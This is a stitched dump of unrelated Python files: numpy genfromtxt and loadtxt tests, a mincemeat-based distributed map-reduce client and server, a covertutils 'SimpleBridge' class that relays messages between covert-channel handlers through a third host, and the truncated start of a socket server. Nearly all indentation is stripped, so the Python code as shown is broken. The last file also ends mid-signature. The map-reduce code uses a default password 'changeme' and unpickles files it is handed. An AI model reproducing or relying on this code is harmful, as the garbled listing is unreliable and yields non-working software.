raise AssertionError(errmsg)
def test_userconverters_with_explicit_dtype(self):
"Test user_converters w/ explicit (standard) dtype"
data = TextIO('skip,skip,2001-01-01,1.0,skip')
test = np.genfromtxt(data, delimiter=",", names=None, dtype=float,
usecols=(2, 3), converters={2: bytes})
control = np.array([('2001-01-01', 1.)],
dtype=[('', '|S10'), ('', float)])
assert_equal(test, control)
def test_spacedelimiter(self):
"Test space delimiter"
data = TextIO("1 2 3 4 5\n6 7 8 9 10")
test = np.ndfromtxt(data)
control = np.array([[1., 2., 3., 4., 5.],
[6., 7., 8., 9., 10.]])
assert_equal(test, control)
def test_integer_delimiter(self):
"Test using an integer for delimiter"
data = " 1 2 3\n 4 5 67\n890123 4"
test = np.genfromtxt(TextIO(data), delimiter=3)
control = np.array([[1, 2, 3], [4, 5, 67], [890, 123, 4]])
assert_equal(test, control)
def test_missing(self):
data = TextIO('1,2,3,,5\n')
test = np.ndfromtxt(data, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
control = np.array([1, 2, 3, -999, 5], int)
assert_equal(test, control)
def test_missing_with_tabs(self):
"Test w/ a delimiter tab"
txt = "1\t2\t3\n\t2\t\n1\t\t3"
test = np.genfromtxt(TextIO(txt), delimiter="\t",
usemask=True,)
ctrl_d = np.array([(1, 2, 3), (np.nan, 2, np.nan), (1, np.nan, 3)],)
ctrl_m = np.array([(0, 0, 0), (1, 0, 1), (0, 1, 0)], dtype=bool)
assert_equal(test.data, ctrl_d)
assert_equal(test.mask, ctrl_m)
def test_usecols(self):
"Test the selection of columns"
# Select 1 column
control = np.array([[1, 2], [3, 4]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1,))
assert_equal(test, control[:, 1])
#
control = np.array([[1, 2, 3], [3, 4, 5]], float)
data = TextIO()
np.savetxt(data, control)
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=(1, 2))
assert_equal(test, control[:, 1:])
# Testing with arrays instead of tuples.
data.seek(0)
test = np.ndfromtxt(data, dtype=float, usecols=np.array([1, 2]))
assert_equal(test, control[:, 1:])
def test_usecols_as_css(self):
"Test giving usecols with a comma-separated string"
data = "1 2 3\n4 5 6"
test = np.genfromtxt(TextIO(data),
names="a, b, c", usecols="a, c")
ctrl = np.array([(1, 3), (4, 6)], dtype=[(_, float) for _ in "ac"])
assert_equal(test, ctrl)
def test_usecols_with_structured_dtype(self):
"Test usecols with an explicit structured dtype"
data = TextIO("JOE 70.1 25.3\nBOB 60.5 27.9")
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
test = np.ndfromtxt(
data, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(test['stid'], [b"JOE", b"BOB"])
assert_equal(test['temp'], [25.3, 27.9])
def test_usecols_with_integer(self):
"Test usecols with an integer"
test = np.genfromtxt(TextIO(b"1 2 3\n4 5 6"), usecols=0)
assert_equal(test, np.array([1., 4.]))
def test_usecols_with_named_columns(self):
"Test usecols with named columns"
ctrl = np.array([(1, 3), (4, 6)], dtype=[('a', float), ('c', float)])
data = "1 2 3\n4 5 6"
kwargs = dict(names="a, b, c")
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
assert_equal(test, ctrl)
test = np.genfromtxt(TextIO(data),
usecols=('a', 'c'), **kwargs)
assert_equal(test, ctrl)
def test_empty_file(self):
"Test that an empty file raises the proper warning."
with warnings.catch_warnings():
warnings.filterwarnings("ignore",
message="genfromtxt: Empty input file:")
data = TextIO()
test = np.genfromtxt(data)
assert_equal(test, np.array([]))
def test_fancy_dtype_alt(self):
"Check that a nested dtype isn't MIA"
data = TextIO('1,2,3.0\n4,5,6.0\n')
fancydtype = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
test = np.mafromtxt(data, dtype=fancydtype, delimiter=',')
control = ma.array([(1, (2, 3.0)), (4, (5, 6.0))], dtype=fancydtype)
assert_equal(test, control)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.ndfromtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_withmissing(self):
data = TextIO('A,B\n0,1\n2,N/A')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.mafromtxt(data, dtype=None, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
#
data.seek(0)
test = np.mafromtxt(data, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.float), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_user_missing_values(self):
data = "A, B, C\n0, 0., 0j\n1, N/A, 1j\n-9, 2.2, N/A\n3, -99, 3j"
basekwargs = dict(dtype=None, delimiter=",", names=True,)
mdtype = [('A', int), ('B', float), ('C', complex)]
#
test = np.mafromtxt(TextIO(data), missing_values="N/A",
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (0, 0, 1), (0, 0, 0)],
dtype=mdtype)
assert_equal(test, control)
#
basekwargs['dtype'] = mdtype
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 1: -99, 2: -999j}, **basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
#
test = np.mafromtxt(TextIO(data),
missing_values={0: -9, 'B': -99, 'C': -999j},
**basekwargs)
control = ma.array([(0, 0.0, 0j), (1, -999, 1j),
(-9, 2.2, -999j), (3, -99, 3j)],
mask=[(0, 0, 0), (0, 1, 0), (1, 0, 1), (0, 1, 0)],
dtype=mdtype)
assert_equal(test, control)
def test_user_filling_values(self):
"Test with missing and filling values"
ctrl = np.array([(0, 3), (4, -999)], dtype=[('a', int), ('b', int)])
data = "N/A, 2, 3\n4, ,???"
kwargs = dict(delimiter=",",
dtype=int,
names="a,b,c",
missing_values={0: "N/A", 'b': " ", 2: "???"},
filling_values={0: 0, 'b': 0, 2: -999})
test = np.genfromtxt(TextIO(data), **kwargs)
ctrl = np.array([(0, 2, 3), (4, 0, -999)],
dtype=[(_, int) for _ in "abc"])
assert_equal(test, ctrl)
#
test = np.genfromtxt(TextIO(data), usecols=(0, -1), **kwargs)
ctrl = np.array([(0, 3), (4, -999)], dtype=[(_, int) for _ in "ac"])
assert_equal(test, ctrl)
def test_withmissing_float(self):
data = TextIO('A,B\n0,1.5\n2,-999.00')
test = np.mafromtxt(data, dtype=None, delimiter=',',
missing_values='-999.0', names=True,)
control = ma.array([(0, 1.5), (2, -1.)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.float)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
def test_with_masked_column_uniform(self):
"Test masked column"
data = TextIO('1 2 3\n4 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([[1, 2, 3], [4, 5, 6]], mask=[[0, 1, 0], [0, 1, 0]])
assert_equal(test, control)
def test_with_masked_column_various(self):
"Test masked column"
data = TextIO('True 2 3\nFalse 5 6\n')
test = np.genfromtxt(data, dtype=None,
missing_values='2,5', usemask=True)
control = ma.array([(1, 2, 3), (0, 5, 6)],
mask=[(0, 1, 0), (0, 1, 0)],
dtype=[('f0', bool), ('f1', bool), ('f2', int)])
assert_equal(test, control)
def test_invalid_raise(self):
"Test invalid raise"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
#
kwargs = dict(delimiter=",", dtype=None, names=True)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, invalid_raise=False, **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'abcde']))
#
mdata.seek(0)
assert_raises(ValueError, np.ndfromtxt, mdata,
delimiter=",", names=True)
def test_invalid_raise_with_usecols(self):
"Test invalid_raise with usecols"
data = ["1, 1, 1, 1, 1"] * 50
for i in range(5):
data[10 * i] = "2, 2, 2, 2 2"
data.insert(0, "a, b, c, d, e")
mdata = TextIO("\n".join(data))
kwargs = dict(delimiter=",", dtype=None, names=True,
invalid_raise=False)
# XXX: is there a better way to get the return value of the callable in
# assert_warns ?
ret = {}
def f(_ret={}):
_ret['mtest'] = np.ndfromtxt(mdata, usecols=(0, 4), **kwargs)
assert_warns(ConversionWarning, f, _ret=ret)
mtest = ret['mtest']
assert_equal(len(mtest), 45)
assert_equal(mtest, np.ones(45, dtype=[(_, int) for _ in 'ae']))
#
mdata.seek(0)
mtest = np.ndfromtxt(mdata, usecols=(0, 1), **kwargs)
assert_equal(len(mtest), 50)
control = np.ones(50, dtype=[(_, int) for _ in 'ab'])
control[[10 * _ for _ in range(5)]] = (2, 2)
assert_equal(mtest, control)
def test_inconsistent_dtype(self):
"Test inconsistent dtype"
data = ["1, 1, 1, 1, -1.1"] * 50
mdata = TextIO("\n".join(data))
converters = {4: lambda x: "(%s)" % x}
kwargs = dict(delimiter=",", converters=converters,
dtype=[(_, int) for _ in 'abcde'],)
assert_raises(ValueError, np.genfromtxt, mdata, **kwargs)
def test_default_field_format(self):
"Test default format"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=None, defaultfmt="f%02i")
ctrl = np.array([(0, 1, 2.3), (4, 5, 6.7)],
dtype=[("f00", int), ("f01", int), ("f02", float)])
assert_equal(mtest, ctrl)
def test_single_dtype_wo_names(self):
"Test single dtype w/o names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, defaultfmt="f%02i")
ctrl = np.array([[0., 1., 2.3], [4., 5., 6.7]], dtype=float)
assert_equal(mtest, ctrl)
def test_single_dtype_w_explicit_names(self):
"Test single dtype w explicit names"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names="a, b, c")
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_single_dtype_w_implicit_names(self):
"Test single dtype w implicit names"
data = "a, b, c\n0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data),
delimiter=",", dtype=float, names=True)
ctrl = np.array([(0., 1., 2.3), (4., 5., 6.7)],
dtype=[(_, float) for _ in "abc"])
assert_equal(mtest, ctrl)
def test_easy_structured_dtype(self):
"Test easy structured dtype"
data = "0, 1, 2.3\n4, 5, 6.7"
mtest = np.ndfromtxt(TextIO(data), delimiter=",",
dtype=(int, float, float), defaultfmt="f_%02i")
ctrl = np.array([(0, 1., 2.3), (4, 5., 6.7)],
dtype=[("f_00", int), ("f_01", float), ("f_02", float)])
assert_equal(mtest, ctrl)
def test_autostrip(self):
"Test autostrip"
data = "01/01/2003 , 1.3, abcde"
kwargs = dict(delimiter=",", dtype=None)
mtest = np.ndfromtxt(TextIO(data), **kwargs)
ctrl = np.array([('01/01/2003 ', 1.3, ' abcde')],
dtype=[('f0', '|S12'), ('f1', float), ('f2', '|S8')])
assert_equal(mtest, ctrl)
mtest = np.ndfromtxt(TextIO(data), autostrip=True, **kwargs)
ctrl = np.array([('01/01/2003', 1.3, 'abcde')],
dtype=[('f0', '|S10'), ('f1', float), ('f2', '|S5')])
assert_equal(mtest, ctrl)
def test_replace_space(self):
"Test the 'replace_space' option"
txt = "A.A, B (B), C:C\n1, 2, 3.14"
# Test default: replace ' ' by '_' and delete non-alphanum chars
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None)
ctrl_dtype = [("AA", int), ("B_B", int), ("CC", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no replace, no delete
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
replace_space='', deletechars='')
ctrl_dtype = [("A.A", int), ("B (B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
# Test: no delete (spaces are replaced by _)
test = np.genfromtxt(TextIO(txt),
delimiter=",", names=True, dtype=None,
deletechars='')
ctrl_dtype = [("A.A", int), ("B_(B)", int), ("C:C", float)]
ctrl = np.array((1, 2, 3.14), dtype=ctrl_dtype)
assert_equal(test, ctrl)
def test_incomplete_names(self):
"Test w/ incomplete names"
data = "A,,C\n0,1,2\n3,4,5"
kwargs = dict(delimiter=",", names=True)
# w/ dtype=None
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, int) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), dtype=None, **kwargs)
assert_equal(test, ctrl)
# w/ default dtype
ctrl = np.array([(0, 1, 2), (3, 4, 5)],
dtype=[(_, float) for _ in ('A', 'f0', 'C')])
test = np.ndfromtxt(TextIO(data), **kwargs)
def test_names_auto_completion(self):
"Make sure that names are properly completed"
data = "1 2 3\n 4 5 6"
test = np.genfromtxt(TextIO(data),
dtype=(int, float, int), names="a")
ctrl = np.array([(1, 2, 3), (4, 5, 6)],
dtype=[('a', int), ('f0', float), ('f1', int)])
assert_equal(test, ctrl)
def test_names_with_usecols_bug1636(self):
"Make sure we pick up the right names w/ usecols"
data = "A,B,C,D,E\n0,1,2,3,4\n0,1,2,3,4\n0,1,2,3,4"
ctrl_names = ("A", "C", "E")
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=(0, 2, 4), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=(int, int, int), delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
#
test = np.genfromtxt(TextIO(data),
dtype=int, delimiter=",",
usecols=("A", "C", "E"), names=True)
assert_equal(test.dtype.names, ctrl_names)
def test_fixed_width_names(self):
"Test fix-width w/ names"
data = " A B C\n 0 1 2.3\n 45 67 9."
kwargs = dict(delimiter=(5, 5, 4), names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
#
kwargs = dict(delimiter=5, names=True, dtype=None)
ctrl = np.array([(0, 1, 2.3), (45, 67, 9.)],
dtype=[('A', int), ('B', int), ('C', float)])
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_filling_values(self):
"Test missing values"
data = b"1, 2, 3\n1, , 5\n0, 6, \n"
kwargs = dict(delimiter=",", dtype=None, filling_values=-999)
ctrl = np.array([[1, 2, 3], [1, -999, 5], [0, 6, -999]], dtype=int)
test = np.ndfromtxt(TextIO(data), **kwargs)
assert_equal(test, ctrl)
def test_comments_is_none(self):
# Github issue 329 (None was previously being converted to 'None').
test = np.genfromtxt(TextIO("test1,testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b'testNonetherestofthedata')
test = np.genfromtxt(TextIO("test1, testNonetherestofthedata"),
dtype=None, comments=None, delimiter=',')
assert_equal(test[1], b' testNonetherestofthedata')
def test_recfromtxt(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(delimiter=",", missing_values="N/A", names=True)
test = np.recfromtxt(data, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromtxt(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
def test_recfromcsv(self):
#
data = TextIO('A,B\n0,1\n2,3')
kwargs = dict(missing_values="N/A", names=True, case_sensitive=True)
test = np.recfromcsv(data, dtype=None, **kwargs)
control = np.array([(0, 1), (2, 3)],
dtype=[('A', np.int), ('B', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
#
data = TextIO('A,B\n0,1\n2,N/A')
test = np.recfromcsv(data, dtype=None, usemask=True, **kwargs)
control = ma.array([(0, 1), (2, -1)],
mask=[(False, False), (False, True)],
dtype=[('A', np.int), ('B', np.int)])
assert_equal(test, control)
assert_equal(test.mask, control.mask)
assert_equal(test.A, [0, 2])
#
data = TextIO('A,B\n0,1\n2,3')
test = np.recfromcsv(data, missing_values='N/A',)
control = np.array([(0, 1), (2, 3)],
dtype=[('a', np.int), ('b', np.int)])
self.assertTrue(isinstance(test, np.recarray))
assert_equal(test, control)
def test_gft_using_filename(self):
# Test that we can load data from a filename as well as a file object
wanted = np.arange(6).reshape((2, 3))
if sys.version_info[0] >= 3:
# python 3k is known to fail for '\r'
linesep = ('\n', '\r\n')
else:
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
f, name = mkstemp()
# We can't use NamedTemporaryFile on windows, because we cannot
# reopen the file.
try:
os.write(f, asbytes(data))
assert_array_equal(np.genfromtxt(name), wanted)
finally:
os.close(f)
os.unlink(name)
def test_gft_using_generator(self):
# gft doesn't work with unicode.
def count():
for i in range(10):
yield asbytes("%d" % i)
res = np.genfromtxt(count())
assert_array_equal(res, np.arange(10))
def test_gzip_load():
a = np.random.random((5, 5))
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
np.save(f, a)
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.load(f), a)
def test_gzip_loadtxt():
    # Thanks to another Windows brokenness, we can't use
    # NamedTemporaryFile: a file created by this function cannot be
    # reopened by another open call. So we first put the gzipped string
    # of the test reference array into a buffer, write it to a securely
    # opened file, and then read that file back with loadtxt.
s = BytesIO()
g = gzip.GzipFile(fileobj=s, mode='w')
g.write(b'1 2 3\n')
g.close()
s.seek(0)
f, name = mkstemp(suffix='.gz')
try:
os.write(f, s.read())
s.close()
assert_array_equal(np.loadtxt(name), [1, 2, 3])
finally:
os.close(f)
os.unlink(name)
def test_gzip_loadtxt_from_string():
s = BytesIO()
f = gzip.GzipFile(fileobj=s, mode="w")
f.write(b'1 2 3\n')
f.close()
s.seek(0)
f = gzip.GzipFile(fileobj=s, mode="r")
assert_array_equal(np.loadtxt(f), [1, 2, 3])
def test_npzfile_dict():
s = BytesIO()
x = np.zeros((3, 3))
y = np.zeros((3, 3))
np.savez(s, x=x, y=y)
s.seek(0)
z = np.load(s)
assert_('x' in z)
assert_('y' in z)
assert_('x' in z.keys())
assert_('y' in z.keys())
for f, a in z.items():
assert_(f in ['x', 'y'])
assert_equal(a.shape, (3, 3))
assert_(len(z.items()) == 2)
for f in z:
assert_(f in ['x', 'y'])
assert_('x' in z.keys())
def test_load_refcount():
# Check that objects returned by np.load are directly freed based on
# their refcount, rather than needing the gc to collect them.
f = BytesIO()
np.savez(f, [1, 2, 3])
f.seek(0)
gc.collect()
n_before = len(gc.get_objects())
np.load(f)
n_after = len(gc.get_objects())
assert_equal(n_before, n_after)
if __name__ == "__main__":
run_module_suite()
|
distmm.py
|
import mincemeat
from mincemeat import Protocol
import socket
import time
import sys
import logging
import logging.handlers
import multiprocessing
from multiprocessing import Pool, Process
import optparse
import collections
import fileiter
import pickle
from mincemeatpy.registry import Registry
import re
import string
MINIMUM_CLIENT_SLEEP_SECONDS = 1
DEFAULT_HOSTNAME = 'localhost'
DEFAULT_PASSWORD = 'changeme'
VERSION = '0.0.1'
DEFAULT_PORT = mincemeat.DEFAULT_PORT
READ_STEP = 500
DELIMITER = ' '
class Client(mincemeat.Client):
def __init__(self, id=None):
mincemeat.Client.__init__(self)
self.key = ''
self.input_file = ''
self.command = b''
if id is not None:
self.id = id
def validate(self, command, data):
task_id, input_file = data
self.key = ''
self.command = command
self.input_file = input_file
if command == b'map':
logging.info("Validate map task")
self.key = Registry.get_instance().generate_key(self.mapfn, input_file)
else:
logging.info("Validate reduce task for %s" % input_file[0])
# self.key = ''
self.key = Registry.get_instance().generate_key_from_files(self.reducefn, input_file)
self.send_command(b'keyurl', (task_id, (self.key, None)))
def start_map(self, command, data):
logging.info("Mapping %s at client %s" % (str(data[0]), self.id))
file = dict(enumerate(fileiter.read(data[1], READ_STEP)))
results = {}
''' running map func on assigned split '''
for key, lines in file.items():
self.call_mapfn(results, (key, lines))
output_file = "%s_map_output" % data[0]
        with open(output_file, 'wb') as f:
            pickle.dump(results, f)
logging.info("generate map results at %s" % output_file)
self.send_command(b'mapdone', (data[0], (self.key, [output_file])))
def call_mapfn(self, results, data):
for k, v in self.mapfn(data[0], data[1]):
if k not in results:
results[k] = []
results[k].append(v)
if self.collectfn:
for k in results:
results[k] = [self.collectfn(k, results[k])]
''' TODO: add partition function '''
def start_reduce(self, command, data):
logging.info("Reducing %s at client %s" % (str(data[0]), self.id))
input_files = data[1]
results = {}
        for file in input_files:
            with open(file, 'rb') as f:
                input_file = pickle.load(f)
            # merge values per key; start from an empty list so the first
            # file's values are not double-counted
            for k, v in input_file.items():
                if k not in results:
                    results[k] = []
                results[k].extend(v)
output_file = "%s_reduce_output" % data[0]
        with open(output_file, 'w') as f:
            for k, v in results.items():
                f.write("%s, %s\n" % (k, str(self.call_reducefn((k, v)))))
self.send_command(b'reducedone', (data[0], (self.key, output_file)))
def call_reducefn(self, data):
return self.reducefn(data[0], data[1])
def start_task(self, command, data):
task_id, url = data
if url is None:
commands = {
b'map': self.start_map,
b'reduce': self.start_reduce
}
commands[self.command](self.command, (task_id, self.input_file))
else:
commands = {
b'map': b'mapdone',
b'reduce': b'reducedone'
}
if self.command == b'map':
url = [url]
self.send_command(commands[self.command], (task_id, (self.key, url)))
def process_command(self, command, data=None):
commands = {
b'mapfn': self.set_mapfn,
b'collectfn': self.set_collectfn,
b'reducefn': self.set_reducefn,
b'map': self.validate,
b'reduce': self.validate,
b'url': self.start_task
}
if command in commands:
commands[command](command, data)
else:
Protocol.process_command(self, command, data)
def run(self, options):
client_sleep_seconds = None
if options.client_sleep_seconds is not None:
client_sleep_seconds = float(options.client_sleep_seconds)
while True:
try:
                if isinstance(options.password, str):
                    options.password = bytes(options.password, "utf-8")
self.password = options.password
self.conn(options.hostname, options.port)
break
except socket.error:
exc_info = sys.exc_info()
logging.debug("%s:{hostname=%s, port=%s}:%s",
exc_info[0],
options.hostname,
options.port,
exc_info[1])
if client_sleep_seconds is None:
time.sleep(MINIMUM_CLIENT_SLEEP_SECONDS)
break
else:
time.sleep(client_sleep_seconds)
print('socket error')
self.__init__()
except KeyboardInterrupt:
break
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
break
def run_client(queue=None, options=None):
h = logging.handlers.QueueHandler(queue)
root = logging.getLogger()
root.addHandler(h)
if options.verbose:
root.setLevel(logging.INFO)
if options.loud:
root.setLevel(logging.DEBUG)
if options.quiet:
root.setLevel(logging.FATAL)
while True:
try:
client = Client(0)
client.run(options)
except KeyboardInterrupt:
break
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
break
finally:
print('end client')
if not options.run_forever:
break
def client_options_parser():
parser = optparse.OptionParser(usage='%prog [options]', version='%%prog %s' % VERSION)
parser.add_option('-p', '--password', dest='password', default=DEFAULT_PASSWORD, help='password')
parser.add_option('-H', '--hostname', dest='hostname', default=DEFAULT_HOSTNAME, help='hostname')
parser.add_option('-P', '--port', dest='port', type='int', default=DEFAULT_PORT, help='port')
parser.add_option('-v', '--verbose', dest='verbose', action='store_true')
parser.add_option('-V', '--loud', dest='loud', action='store_true')
parser.add_option('-q', '--quiet', dest='quiet', action='store_true')
parser.add_option('-n', '--number_of_clients', dest='number_of_clients', default='1',
help='number of client processes')
parser.add_option('-s', '--sleep', dest='client_sleep_seconds', default=None, help='client sleep seconds')
parser.add_option('-t', '--client_timeout', dest='client_timeout_seconds', default=None,
help='worker timeout seconds')
parser.add_option('-8', '--run_forever', dest='run_forever', action='store_true')
parser.add_option('-i', '--input_filename', dest='input_filename', default='', help='input filename')
return parser
def run_clients(queue, options=None):
parser = client_options_parser()
(default_options, args) = parser.parse_args([])
if options is not None:
try:
default_options.__dict__.update(options.__dict__)
except:
default_options.__dict__.update(options)
options = default_options
number_of_clients = int(options.number_of_clients)
pool = Pool(processes=number_of_clients)
try:
for i in range(number_of_clients):
pool.apply_async(run_client, kwds=dict(options=options, queue=queue))
except KeyboardInterrupt:
exc_info = sys.exc_info()
logging.debug("%s:%s", exc_info[0], exc_info[1])
pool.terminate()
pool.join()
except:
exc_info = sys.exc_info()
logging.exception("%s:%s", exc_info[0], exc_info[1])
pool.terminate()
else:
pool.close()
finally:
print('end pool')
pool.join()
def map_default(k, v):
yield k, v
def reduce_default(k, vs):
if len(vs) == 1:
return vs[0]
else:
return vs
class Server(mincemeat.Server):
def __init__(self, datasource=None):
mincemeat.Server.__init__(self)
self.datasource = datasource
self.mapfn = map_default
self.reducefn = reduce_default
def run_server(options):
parser = client_options_parser()
(default_options, args) = parser.parse_args([])
if options is not None:
try:
default_options.__dict__.update(options.__dict__)
except:
default_options.__dict__.update(options)
options = default_options
logging.debug(options)
''' initialize server data and assign map/reduce function '''
datasource = None
    if isinstance(options.datasource, collections.abc.Mapping):
datasource = options.datasource
else:
datasource = dict(enumerate(options.datasource))
server = None
if 'server' in options.__dict__:
server = options.server(datasource)
else:
server = Server(datasource)
if 'mapfn' in options.__dict__:
server.mapfn = options.mapfn
if 'reducefn' in options.__dict__:
server.reducefn = options.reducefn
if 'cache' in options.__dict__:
server.cache_on = options.cache
return server.run_server(password=options.password)
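# ----------------------------------------------------------------------
# Usage sketch for run_server (hypothetical names and values; run_server
# merges the attribute dict you pass in with the option-parser defaults
# above, so password falls back to DEFAULT_PASSWORD and only datasource
# is strictly required):
#
#   def wc_map(k, line):
#       for word in line.split():
#           yield word, 1
#
#   def wc_reduce(k, counts):
#       return sum(counts)
#
#   class Opts(object):
#       pass
#
#   opts = Opts()
#   opts.datasource = {0: 'a b a', 1: 'b c'}  # any Mapping, or an iterable
#   opts.mapfn = wc_map
#   opts.reducefn = wc_reduce
#   results = run_server(opts)
# ----------------------------------------------------------------------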
def listener_configurer():
root = logging.getLogger()
h = logging.FileHandler('debug.log', 'a')
f = logging.Formatter('%(asctime)s %(processName)-10s %(name)s %(levelname)-8s %(message)s')
h.setFormatter(f)
root.addHandler(h)
def listener_process(queue, configurer):
configurer()
while True:
try:
record = queue.get()
if record is None: # We send this as a sentinel to tell the listener to quit.
break
logger = logging.getLogger(record.name)
logger.handle(record) # No level or filter logic applied - just do it!
except Exception:
import sys, traceback
print('Whoops! Problem:', file=sys.stderr)
traceback.print_exc(file=sys.stderr)
if __name__ == '__main__':
parser = client_options_parser()
(options, args) = parser.parse_args()
if options.verbose:
logging.basicConfig(level=logging.INFO)
if options.loud:
logging.basicConfig(level=logging.DEBUG)
if options.quiet:
logging.basicConfig(level=logging.FATAL)
if len(args) > 0:
options.hostname = args[0]
logging.debug('options: %s', options)
queue = multiprocessing.Manager().Queue(-1)
listener = Process(target=listener_process, args=(queue, listener_configurer))
listener.start()
# p = Process(target=run_clients, args=(queue, options))
# p.start()
# p.join()
run_clients(queue, options)
queue.put_nowait(None)
listener.join()
print('end')
|
simplebridge.py
|
from covertutils.handlers import BufferingHandler
from threading import Thread
from time import sleep
class SimpleBridge :
"""
The Bridge class is used to pass messages between 2 Handler objects. It can be used to bridge an Agent and a Handler using a third host.
"""
def __init__( self, lhandler, rhandler ) :
if not( isinstance(lhandler, BufferingHandler) and isinstance(rhandler, BufferingHandler) ) :
raise TypeError( "Argument is not of type 'BufferingHandler'" )
self.lcondition = lhandler.getCondition()
self.rcondition = rhandler.getCondition()
self.l2r_thread = Thread( target = self.__intercommunication, args = ( lhandler, rhandler, self.lcondition ) )
self.r2l_thread = Thread( target = self.__intercommunication, args = ( rhandler, lhandler, self.rcondition ) )
self.r2l_thread.daemon = True
self.l2r_thread.daemon = True
self.r2l_thread.start()
self.l2r_thread.start()
def __intercommunication( self, lhandler, rhandler, lcondition ) :
while True :
# print "Started loop"
lcondition.acquire()
# print "Started acquired!"
if lhandler.empty() :
lcondition.wait()
# print "Acquired condition"
stream, message = lhandler.get()
# print stream, message
# print "Sending"
rhandler.preferred_send( message, stream )
lcondition.release()
# lcondition.notify()
# print "Leaving loop"
sleep(0.01)
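# ----------------------------------------------------------------------
# Usage sketch (assumption: `lhandler` and `rhandler` are already
# constructed covertutils BufferingHandler instances; their setup is
# omitted here):
#
#   bridge = SimpleBridge( lhandler, rhandler )
#
# The constructor starts two daemon threads that block on each handler's
# Condition and forward every buffered (stream, message) pair to the
# other handler via preferred_send(), in both directions.
# ----------------------------------------------------------------------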
|
socket_server.py
|
import json
import socket
import uuid
from threading import Thread
import byte_utils
class SocketServer:
def __init__(self, ip, port, motd, version_text, kick_message, samples, server_icon, logger, show_hostname, player_max, player_online, protocol):
